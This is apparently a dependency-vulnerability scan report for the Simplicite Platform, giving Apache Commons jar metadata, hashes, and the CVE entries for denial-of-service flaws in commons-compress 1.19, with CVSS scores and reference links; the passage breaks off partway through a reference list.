Evidence Type Source Name Value Confidence Vendor file name commons-codec High Vendor jar package name apache Highest Vendor jar package name codec Highest Vendor jar package name commons Highest Vendor jar package name encoder Highest Vendor Manifest automatic-module-name org.apache.commons.codec Medium Vendor Manifest bundle-docurl https://commons.apache.org/proper/commons-codec/ Low Vendor Manifest bundle-symbolicname org.apache.commons.commons-codec Medium Vendor Manifest implementation-url https://commons.apache.org/proper/commons-codec/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id commons-codec Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-codec Highest Vendor pom artifactid commons-codec Low Vendor pom developer email bayard@apache.org Low Vendor pom developer email chtompki@apache.org Low Vendor pom developer email dgraham@apache.org Low Vendor pom developer email dlr@finemaltcoding.com Low Vendor pom developer email ggregory@apache.org Low Vendor pom developer email jon@collab.net Low Vendor pom developer email julius@apache.org Low Vendor pom developer email rwaldhoff@apache.org Low Vendor pom developer email sanders@totalsync.com Low Vendor pom developer email tn@apache.org Low Vendor pom developer email tobrien@apache.org Low Vendor pom developer id bayard Medium Vendor pom developer id chtompki Medium Vendor pom developer id dgraham Medium Vendor pom developer id dlr Medium Vendor pom developer id ggregory Medium Vendor pom developer id jon Medium Vendor pom developer id julius Medium Vendor pom developer id rwaldhoff Medium Vendor pom developer id sanders Medium Vendor pom developer id tn Medium Vendor pom developer id tobrien Medium Vendor pom developer name Daniel Rall Medium Vendor pom developer name David Graham Medium Vendor pom developer name Gary Gregory Medium Vendor pom developer name Henri Yandell Medium Vendor pom developer name Jon S. Stevens Medium Vendor pom developer name Julius Davies Medium Vendor pom developer name Rob Tompkins Medium Vendor pom developer name Rodney Waldhoff Medium Vendor pom developer name Scott Sanders Medium Vendor pom developer name Thomas Neidhart Medium Vendor pom developer name Tim OBrien Medium Vendor pom developer org URL http://juliusdavies.ca/ Medium Vendor pom groupid commons-codec Highest Vendor pom name Apache Commons Codec High Vendor pom parent-artifactid commons-parent Low Vendor pom parent-groupid org.apache.commons Medium Vendor pom url https://commons.apache.org/proper/commons-codec/ Highest Product file name commons-codec High Product jar package name apache Highest Product jar package name codec Highest Product jar package name commons Highest Product jar package name encoder Highest Product Manifest automatic-module-name org.apache.commons.codec Medium Product Manifest bundle-docurl https://commons.apache.org/proper/commons-codec/ Low Product Manifest Bundle-Name Apache Commons Codec Medium Product Manifest bundle-symbolicname org.apache.commons.commons-codec Medium Product Manifest Implementation-Title Apache Commons Codec High Product Manifest implementation-url https://commons.apache.org/proper/commons-codec/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title Apache Commons Codec Medium Product pom artifactid commons-codec Highest Product pom developer email bayard@apache.org Low Product pom developer email chtompki@apache.org Low Product pom developer email dgraham@apache.org Low Product pom developer email dlr@finemaltcoding.com Low Product pom developer email ggregory@apache.org Low Product pom developer email jon@collab.net Low Product pom developer email julius@apache.org Low Product pom developer email rwaldhoff@apache.org Low Product pom developer email sanders@totalsync.com Low Product pom developer email tn@apache.org Low Product pom developer email tobrien@apache.org Low Product pom developer id bayard Low Product pom developer id chtompki Low Product pom developer id dgraham Low Product pom developer id dlr Low Product pom developer id ggregory Low Product pom developer id jon Low Product pom developer id julius Low Product pom developer id rwaldhoff Low Product pom developer id sanders Low Product pom developer id tn Low Product pom developer id tobrien Low Product pom developer name Daniel Rall Low Product pom developer name David Graham Low Product pom developer name Gary Gregory Low Product pom developer name Henri Yandell Low Product pom developer name Jon S. Stevens Low Product pom developer name Julius Davies Low Product pom developer name Rob Tompkins Low Product pom developer name Rodney Waldhoff Low Product pom developer name Scott Sanders Low Product pom developer name Thomas Neidhart Low Product pom developer name Tim OBrien Low Product pom developer org URL http://juliusdavies.ca/ Low Product pom groupid commons-codec Highest Product pom name Apache Commons Codec High Product pom parent-artifactid commons-parent Medium Product pom parent-groupid org.apache.commons Medium Product pom url https://commons.apache.org/proper/commons-codec/ Medium Version file version 1.13 High Version Manifest Implementation-Version 1.13 High Version pom parent-version 1.13 Low Version pom version 1.13 Highest
commons-collections-3.2.2.jarDescription:
Types that extend and augment the Java Collections Framework. License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/commons-collections/commons-collections/3.2.2/commons-collections-3.2.2.jar
MD5: f54a8510f834a1a57166970bfc982e94
SHA1: 8ad72fe39fa8c91eaaf12aadb21e0c3661fe26d5
SHA256: eeeae917917144a68a741d4c0dff66aa5c5c5fd85593ff217bced3fc8ca783b8
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-collections High Vendor jar package name apache Highest Vendor jar package name collections Highest Vendor jar package name commons Highest Vendor Manifest bundle-docurl http://commons.apache.org/collections/ Low Vendor Manifest bundle-symbolicname org.apache.commons.collections Medium Vendor Manifest implementation-build tags/COLLECTIONS_3_2_2_RC3@r1714131; 2015-11-13 00:09:45+0100 Low Vendor Manifest implementation-url http://commons.apache.org/collections/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.3))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-collections Highest Vendor pom artifactid commons-collections Low Vendor pom developer id amamment Medium Vendor pom developer id bayard Medium Vendor pom developer id craigmcc Medium Vendor pom developer id geirm Medium Vendor pom developer id jcarman Medium Vendor pom developer id matth Medium Vendor pom developer id morgand Medium Vendor pom developer id psteitz Medium Vendor pom developer id rdonkin Medium Vendor pom developer id rwaldhoff Medium Vendor pom developer id scolebourne Medium Vendor pom developer name Arun M. Thomas Medium Vendor pom developer name Craig McClanahan Medium Vendor pom developer name Geir Magnusson Medium Vendor pom developer name Henri Yandell Medium Vendor pom developer name James Carman Medium Vendor pom developer name Matthew Hawthorne Medium Vendor pom developer name Morgan Delagrange Medium Vendor pom developer name Phil Steitz Medium Vendor pom developer name Robert Burrell Donkin Medium Vendor pom developer name Rodney Waldhoff Medium Vendor pom developer name Stephen Colebourne Medium Vendor pom groupid commons-collections Highest Vendor pom name Apache Commons Collections High Vendor pom parent-artifactid commons-parent Low Vendor pom parent-groupid org.apache.commons Medium Vendor pom url http://commons.apache.org/collections/ Highest Product file name commons-collections High Product jar package name apache Highest Product jar package name collections Highest Product jar package name commons Highest Product Manifest bundle-docurl http://commons.apache.org/collections/ Low Product Manifest Bundle-Name Apache Commons Collections Medium Product Manifest bundle-symbolicname org.apache.commons.collections Medium Product Manifest implementation-build tags/COLLECTIONS_3_2_2_RC3@r1714131; 2015-11-13 00:09:45+0100 Low Product Manifest Implementation-Title Apache Commons Collections High Product Manifest implementation-url http://commons.apache.org/collections/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.3))" Low Product Manifest specification-title Apache Commons Collections Medium Product pom artifactid commons-collections Highest Product pom developer id amamment Low Product pom developer id bayard Low Product pom developer id craigmcc Low Product pom developer id geirm Low Product pom developer id jcarman Low Product pom developer id matth Low Product pom developer id morgand Low Product pom developer id psteitz Low Product pom developer id rdonkin Low Product pom developer id rwaldhoff Low Product pom developer id scolebourne Low Product pom developer name Arun M. Thomas Low Product pom developer name Craig McClanahan Low Product pom developer name Geir Magnusson Low Product pom developer name Henri Yandell Low Product pom developer name James Carman Low Product pom developer name Matthew Hawthorne Low Product pom developer name Morgan Delagrange Low Product pom developer name Phil Steitz Low Product pom developer name Robert Burrell Donkin Low Product pom developer name Rodney Waldhoff Low Product pom developer name Stephen Colebourne Low Product pom groupid commons-collections Highest Product pom name Apache Commons Collections High Product pom parent-artifactid commons-parent Medium Product pom parent-groupid org.apache.commons Medium Product pom url http://commons.apache.org/collections/ Medium Version file version 3.2.2 High Version Manifest Bundle-Version 3.2.2 High Version Manifest Implementation-Version 3.2.2 High Version pom parent-version 3.2.2 Low Version pom version 3.2.2 Highest
commons-collections4-4.4.jarDescription:
The Apache Commons Collections package contains types that extend and augment the Java Collections Framework. License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/commons/commons-collections4/4.4/commons-collections4-4.4.jar
MD5: 4a37023740719b391f10030362c86be6
SHA1: 62ebe7544cb7164d87e0637a2a6a2bdc981395e8
SHA256: 1df8b9430b5c8ed143d7815e403e33ef5371b2400aadbe9bda0883762e0846d1
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-collections4 High Vendor jar package name apache Highest Vendor jar package name collections4 Highest Vendor jar package name commons Highest Vendor Manifest automatic-module-name org.apache.commons.collections4 Medium Vendor Manifest bundle-docurl https://commons.apache.org/proper/commons-collections/ Low Vendor Manifest bundle-symbolicname org.apache.commons.commons-collections4 Medium Vendor Manifest implementation-url https://commons.apache.org/proper/commons-collections/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.commons Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-collections4 Highest Vendor pom artifactid commons-collections4 Low Vendor pom developer id adriannistor Medium Vendor pom developer id amamment Medium Vendor pom developer id bayard Medium Vendor pom developer id chtompki Medium Vendor pom developer id craigmcc Medium Vendor pom developer id dlaha Medium Vendor pom developer id geirm Medium Vendor pom developer id ggregory Medium Vendor pom developer id jcarman Medium Vendor pom developer id luc Medium Vendor pom developer id matth Medium Vendor pom developer id mbenson Medium Vendor pom developer id morgand Medium Vendor pom developer id rdonkin Medium Vendor pom developer id rwaldhoff Medium Vendor pom developer id scolebourne Medium Vendor pom developer id tn Medium Vendor pom developer name Adrian Nistor Medium Vendor pom developer name Arun M. Thomas Medium Vendor pom developer name Craig McClanahan Medium Vendor pom developer name Dipanjan Laha Medium Vendor pom developer name Gary Gregory Medium Vendor pom developer name Geir Magnusson Medium Vendor pom developer name Henri Yandell Medium Vendor pom developer name James Carman Medium Vendor pom developer name Luc Maisonobe Medium Vendor pom developer name Matt Benson Medium Vendor pom developer name Matthew Hawthorne Medium Vendor pom developer name Morgan Delagrange Medium Vendor pom developer name Rob Tompkins Medium Vendor pom developer name Robert Burrell Donkin Medium Vendor pom developer name Rodney Waldhoff Medium Vendor pom developer name Stephen Colebourne Medium Vendor pom developer name Thomas Neidhart Medium Vendor pom groupid org.apache.commons Highest Vendor pom name Apache Commons Collections High Vendor pom parent-artifactid commons-parent Low Vendor pom url https://commons.apache.org/proper/commons-collections/ Highest Product file name commons-collections4 High Product jar package name apache Highest Product jar package name collections4 Highest Product jar package name commons Highest Product Manifest automatic-module-name org.apache.commons.collections4 Medium Product Manifest bundle-docurl https://commons.apache.org/proper/commons-collections/ Low Product Manifest Bundle-Name Apache Commons Collections Medium Product Manifest bundle-symbolicname org.apache.commons.commons-collections4 Medium Product Manifest Implementation-Title Apache Commons Collections High Product Manifest implementation-url https://commons.apache.org/proper/commons-collections/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product Manifest specification-title Apache Commons Collections Medium Product pom artifactid commons-collections4 Highest Product pom developer id adriannistor Low Product pom developer id amamment Low Product pom developer id bayard Low Product pom developer id chtompki Low Product pom developer id craigmcc Low Product pom developer id dlaha Low Product pom developer id geirm Low Product pom developer id ggregory Low Product pom developer id jcarman Low Product pom developer id luc Low Product pom developer id matth Low Product pom developer id mbenson Low Product pom developer id morgand Low Product pom developer id rdonkin Low Product pom developer id rwaldhoff Low Product pom developer id scolebourne Low Product pom developer id tn Low Product pom developer name Adrian Nistor Low Product pom developer name Arun M. Thomas Low Product pom developer name Craig McClanahan Low Product pom developer name Dipanjan Laha Low Product pom developer name Gary Gregory Low Product pom developer name Geir Magnusson Low Product pom developer name Henri Yandell Low Product pom developer name James Carman Low Product pom developer name Luc Maisonobe Low Product pom developer name Matt Benson Low Product pom developer name Matthew Hawthorne Low Product pom developer name Morgan Delagrange Low Product pom developer name Rob Tompkins Low Product pom developer name Robert Burrell Donkin Low Product pom developer name Rodney Waldhoff Low Product pom developer name Stephen Colebourne Low Product pom developer name Thomas Neidhart Low Product pom groupid org.apache.commons Highest Product pom name Apache Commons Collections High Product pom parent-artifactid commons-parent Medium Product pom url https://commons.apache.org/proper/commons-collections/ Medium Version file version 4.4 High Version Manifest Implementation-Version 4.4 High Version pom parent-version 4.4 Low Version pom version 4.4 Highest
commons-compress-1.19.jarDescription:
Apache Commons Compress software defines an API for working with
compression and archive formats. These include: bzip2, gzip, pack200,
lzma, xz, Snappy, traditional Unix Compress, DEFLATE, DEFLATE64, LZ4,
Brotli, Zstandard and ar, cpio, jar, tar, zip, dump, 7z, arj.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/commons/commons-compress/1.19/commons-compress-1.19.jar
MD5: fe897bced43468450b785b66c1cff455
SHA1: 7e65777fb451ddab6a9c054beb879e521b7eab78
SHA256: ff2d59fad74e867630fbc7daab14c432654712ac624dbee468d220677b124dd5
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-compress High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name compress Highest Vendor Manifest automatic-module-name org.apache.commons.compress Medium Vendor Manifest bundle-docurl https://commons.apache.org/proper/commons-compress/ Low Vendor Manifest bundle-symbolicname org.apache.commons.commons-compress Medium Vendor Manifest extension-name org.apache.commons.compress Medium Vendor Manifest implementation-build UNKNOWN@r516f76ac1fe48be9a5162e53e4d0a99f23774565; 2019-08-24 16:14:33+0000 Low Vendor Manifest implementation-url https://commons.apache.org/proper/commons-compress/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-compress Highest Vendor pom artifactid commons-compress Low Vendor pom developer email bodewig at apache.org Low Vendor pom developer email chtompki at apache.org Low Vendor pom developer email damjan at apache.org Low Vendor pom developer email ebourg at apache.org Low Vendor pom developer email ggregory at apache.org Low Vendor pom developer email grobmeier at apache.org Low Vendor pom developer email julius at apache.org Low Vendor pom developer email sebb at apache.org Low Vendor pom developer email tcurdt at apache.org Low Vendor pom developer id bodewig Medium Vendor pom developer id chtompki Medium Vendor pom developer id damjan Medium Vendor pom developer id ebourg Medium Vendor pom developer id ggregory Medium Vendor pom developer id grobmeier Medium Vendor pom developer id julius Medium Vendor pom developer id sebb Medium Vendor pom developer id tcurdt Medium Vendor pom developer name Christian Grobmeier Medium Vendor pom developer name Damjan Jovanovic Medium Vendor pom developer name Emmanuel Bourg Medium Vendor pom developer name Gary Gregory Medium Vendor pom developer name Julius Davies Medium Vendor pom developer name Rob Tompkins Medium Vendor pom developer name Sebastian Bazley Medium Vendor pom developer name Stefan Bodewig Medium Vendor pom developer name Torsten Curdt Medium Vendor pom groupid org.apache.commons Highest Vendor pom name Apache Commons Compress High Vendor pom parent-artifactid commons-parent Low Vendor pom url https://commons.apache.org/proper/commons-compress/ Highest Product file name commons-compress High Product jar package name apache Highest Product jar package name commons Highest Product jar package name compress Highest Product Manifest automatic-module-name org.apache.commons.compress Medium Product Manifest bundle-docurl https://commons.apache.org/proper/commons-compress/ Low Product Manifest Bundle-Name Apache Commons Compress Medium Product Manifest bundle-symbolicname org.apache.commons.commons-compress Medium Product Manifest extension-name org.apache.commons.compress Medium Product Manifest implementation-build UNKNOWN@r516f76ac1fe48be9a5162e53e4d0a99f23774565; 2019-08-24 16:14:33+0000 Low Product Manifest Implementation-Title Apache Commons Compress High Product Manifest implementation-url https://commons.apache.org/proper/commons-compress/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title Apache Commons Compress Medium Product pom artifactid commons-compress Highest Product pom developer email bodewig at apache.org Low Product pom developer email chtompki at apache.org Low Product pom developer email damjan at apache.org Low Product pom developer email ebourg at apache.org Low Product pom developer email ggregory at apache.org Low Product pom developer email grobmeier at apache.org Low Product pom developer email julius at apache.org Low Product pom developer email sebb at apache.org Low Product pom developer email tcurdt at apache.org Low Product pom developer id bodewig Low Product pom developer id chtompki Low Product pom developer id damjan Low Product pom developer id ebourg Low Product pom developer id ggregory Low Product pom developer id grobmeier Low Product pom developer id julius Low Product pom developer id sebb Low Product pom developer id tcurdt Low Product pom developer name Christian Grobmeier Low Product pom developer name Damjan Jovanovic Low Product pom developer name Emmanuel Bourg Low Product pom developer name Gary Gregory Low Product pom developer name Julius Davies Low Product pom developer name Rob Tompkins Low Product pom developer name Sebastian Bazley Low Product pom developer name Stefan Bodewig Low Product pom developer name Torsten Curdt Low Product pom groupid org.apache.commons Highest Product pom name Apache Commons Compress High Product pom parent-artifactid commons-parent Medium Product pom url https://commons.apache.org/proper/commons-compress/ Medium Version file version 1.19 High Version Manifest Implementation-Version 1.19 High Version pom parent-version 1.19 Low Version pom version 1.19 Highest
CVE-2021-35515 suppress
When reading a specially crafted 7Z archive, the construction of the list of codecs that decompress an entry can result in an infinite loop. This could be used to mount a denial of service attack against services that use Compress' sevenz package. CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
- [announce] 20210713 CVE-2021-35515: Apache Commons Compress 1.6 to 1.20 denial of service vulnerability - [druid-commits] 20210726 [GitHub] [druid] suneet-s merged pull request #11496: Address CVE-2021-35515 CVE-2021-36090 - [druid-commits] 20210726 [GitHub] [druid] suneet-s opened a new pull request #11496: Address CVE-2021-35515 CVE-2021-36090 - [druid-commits] 20210726 [druid] branch master updated: Address CVE-2021-35515 CVE-2021-36090 (#11496) - [poi-dev] 20210923 Re: [VOTE] Apache POI 5.1.0 release (RC1) - [pulsar-commits] 20210716 [GitHub] [pulsar] lhotari opened a new pull request #11345: [Security] Upgrade commons-compress to 1.21 - [skywalking-notifications] 20210802 [GitHub] [skywalking] codecov[bot] commented on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210802 [GitHub] [skywalking] codecov[bot] edited a comment on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210802 [GitHub] [skywalking] wu-sheng opened a new pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210802 [skywalking] 01/01: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210803 [GitHub] [skywalking] codecov[bot] edited a comment on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210803 [GitHub] [skywalking] hanahmily merged pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210803 [skywalking] branch master updated: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 (#7400) CONFIRM - https://security.netapp.com/advisory/ntap-20211022-0001/ MISC - https://commons.apache.org/proper/commons-compress/security-reports.html MISC - https://lists.apache.org/thread.html/r19ebfd71770ec0617a9ea180e321ef927b3fefb4c81ec5d1902d20ab%40%3Cuser.commons.apache.org%3E MISC - https://www.oracle.com/security-alerts/cpuapr2022.html MISC - https://www.oracle.com/security-alerts/cpujan2022.html MISC - https://www.oracle.com/security-alerts/cpuoct2021.html MLIST - [oss-security] 20210713 CVE-2021-35515: Apache Commons Compress 1.6 to 1.20 denial of service vulnerability N/A - N/A OSSINDEX - [CVE-2021-35515] CWE-834: Excessive Iteration OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35515 OSSIndex - https://commons.apache.org/proper/commons-compress/security-reports.html OSSIndex - https://lists.apache.org/thread.html/rbaea15ddc5a7c0c6b66660f1d6403b28595e2561bb283eade7d7cd69@%3Cannounce.apache.org%3E Vulnerable Software & Versions: (show all )
CVE-2021-35516 suppress
When reading a specially crafted 7Z archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' sevenz package. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
- [announce] 20210713 CVE-2021-35516: Apache Commons Compress 1.6 to 1.20 denial of service vulnerability - [poi-dev] 20210923 Re: [VOTE] Apache POI 5.1.0 release (RC1) - [pulsar-commits] 20210716 [GitHub] [pulsar] lhotari opened a new pull request #11345: [Security] Upgrade commons-compress to 1.21 - [skywalking-notifications] 20210802 [GitHub] [skywalking] codecov[bot] commented on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210802 [GitHub] [skywalking] codecov[bot] edited a comment on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210802 [GitHub] [skywalking] wu-sheng opened a new pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210802 [skywalking] 01/01: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210803 [GitHub] [skywalking] codecov[bot] edited a comment on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210803 [GitHub] [skywalking] hanahmily merged pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210803 [skywalking] branch master updated: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 (#7400) CONFIRM - https://security.netapp.com/advisory/ntap-20211022-0001/ MISC - https://commons.apache.org/proper/commons-compress/security-reports.html MISC - https://lists.apache.org/thread.html/rf68442d67eb166f4b6cf0bbbe6c7f99098c12954f37332073c9822ca%40%3Cuser.commons.apache.org%3E MISC - https://www.oracle.com/security-alerts/cpuapr2022.html MISC - https://www.oracle.com/security-alerts/cpujan2022.html MISC - https://www.oracle.com/security-alerts/cpuoct2021.html MLIST - [oss-security] 20210713 CVE-2021-35516: Apache Commons Compress 1.6 to 1.20 denial of service vulnerability N/A - N/A OSSINDEX - [CVE-2021-35516] CWE-130: Improper Handling of Length Parameter Inconsistency OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35516 OSSIndex - https://commons.apache.org/proper/commons-compress/security-reports.html OSSIndex - https://issues.apache.org/jira/browse/COMPRESS-542 Vulnerable Software & Versions: (show all )
CVE-2021-35517 suppress
When reading a specially crafted TAR archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' tar package. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
- [announce] 20210713 CVE-2021-35517: Apache Commons Compress 1.1 to 1.20 denial of service vulnerability - [announce] 20210713 CVE-2021-36373: Apache Ant TAR archive denial of service vulnerability - [ant-user] 20210713 CVE-2021-36373: Apache Ant TAR archive denial of service vulnerability - [flink-issues] 20210908 [GitHub] [flink] MartijnVisser opened a new pull request #17194: [FLINK-24034] Upgrade commons-compress to 1.21 and other apache.commons updates - [poi-dev] 20210923 Re: [VOTE] Apache POI 5.1.0 release (RC1) - [pulsar-commits] 20210716 [GitHub] [pulsar] lhotari opened a new pull request #11345: [Security] Upgrade commons-compress to 1.21 - [skywalking-notifications] 20210802 [GitHub] [skywalking] codecov[bot] commented on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210802 [GitHub] [skywalking] codecov[bot] edited a comment on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210802 [GitHub] [skywalking] wu-sheng opened a new pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210802 [skywalking] 01/01: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210803 [GitHub] [skywalking] codecov[bot] edited a comment on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210803 [GitHub] [skywalking] hanahmily merged pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210803 [skywalking] branch master updated: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 (#7400) CONFIRM - https://security.netapp.com/advisory/ntap-20211022-0001/ MISC - https://commons.apache.org/proper/commons-compress/security-reports.html MISC - https://lists.apache.org/thread.html/r605d906b710b95f1bbe0036a53ac6968f667f2c249b6fbabada9a940%40%3Cuser.commons.apache.org%3E MISC - https://www.oracle.com/security-alerts/cpuapr2022.html MISC - https://www.oracle.com/security-alerts/cpujan2022.html MISC - https://www.oracle.com/security-alerts/cpuoct2021.html MLIST - [oss-security] 20210713 CVE-2021-35517: Apache Commons Compress 1.1 to 1.20 denial of service vulnerability MLIST - [oss-security] 20210713 CVE-2021-36373: Apache Ant TAR archive denial of service vulnerability N/A - N/A OSSINDEX - [CVE-2021-35517] CWE-130: Improper Handling of Length Parameter Inconsistency OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35517 OSSIndex - https://github.com/OpenLiberty/open-liberty/issues/18808 OSSIndex - https://github.com/OpenLiberty/open-liberty/pull/17872 OSSIndex - https://lists.apache.org/thread.html/ra393ffdc7c90a4a37ea023946f390285693795013a642d80fba20203@%3Cannounce.apache.org%3E OSSIndex - https://openliberty.io/docs/latest/security-vulnerabilities.html Vulnerable Software & Versions: (show all )
CVE-2021-36090 suppress
When reading a specially crafted ZIP archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' zip package. NVD-CWE-Other
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
- [announce] 20210713 CVE-2021-36090: Apache Commons Compress 1.0 to 1.20 denial of service vulnerability - [announce] 20210713 CVE-2021-36374: Apache Ant ZIP, and ZIP based, archive denial of service vulerability - [ant-user] 20210713 CVE-2021-36374: Apache Ant ZIP, and ZIP based, archive denial of service vulerability - [drill-commits] 20210804 [drill] branch master updated: Bump commons-compress from 1.20 to 1.21 for CVE-2021-36090 - [drill-dev] 20210803 [jira] [Created] (DRILL-7981) Bump commons-compress from 1.20 to 1.21 for CVE-2021-36090 - [drill-dev] 20210804 [GitHub] [drill] luocooong merged pull request #2285: DRILL-7981: Bump commons-compress from 1.20 to 1.21 for CVE-2021-36090 - [drill-dev] 20210804 [GitHub] [drill] luocooong opened a new pull request #2285: Bump commons-compress from 1.20 to 1.21 for CVE-2021-36090 - [drill-dev] 20210805 [GitHub] [drill] luocooong merged pull request #2285: DRILL-7981: Bump commons-compress from 1.20 to 1.21 for CVE-2021-36090 - [drill-issues] 20210803 [jira] [Created] (DRILL-7981) Bump commons-compress from 1.20 to 1.21 for CVE-2021-36090 - [drill-issues] 20210804 [jira] [Commented] (DRILL-7981) Bump commons-compress from 1.20 to 1.21 for CVE-2021-36090 - [drill-issues] 20210805 [jira] [Commented] (DRILL-7981) Bump commons-compress from 1.20 to 1.21 for CVE-2021-36090 - [druid-commits] 20210726 [GitHub] [druid] suneet-s merged pull request #11496: Address CVE-2021-35515 CVE-2021-36090 - [druid-commits] 20210726 [GitHub] [druid] suneet-s opened a new pull request #11496: Address CVE-2021-35515 CVE-2021-36090 - [druid-commits] 20210726 [druid] branch master updated: Address CVE-2021-35515 CVE-2021-36090 (#11496) - [james-notifications] 20210714 [GitHub] [james-project] chibenwa opened a new pull request #537: [UPGRADE] Security upgrade: common-compress to 1.21 - [poi-dev] 20210923 Re: [VOTE] Apache POI 5.1.0 release (RC1) - [pulsar-commits] 20210716 [GitHub] [pulsar] lhotari opened a new pull request #11345: [Security] Upgrade commons-compress to 1.21 - [skywalking-notifications] 20210802 [GitHub] [skywalking] codecov[bot] commented on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 20210802 [GitHub] [skywalking] codecov[bot] edited a comment on pull request #7400: Fix CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090 - [skywalking-notifications] 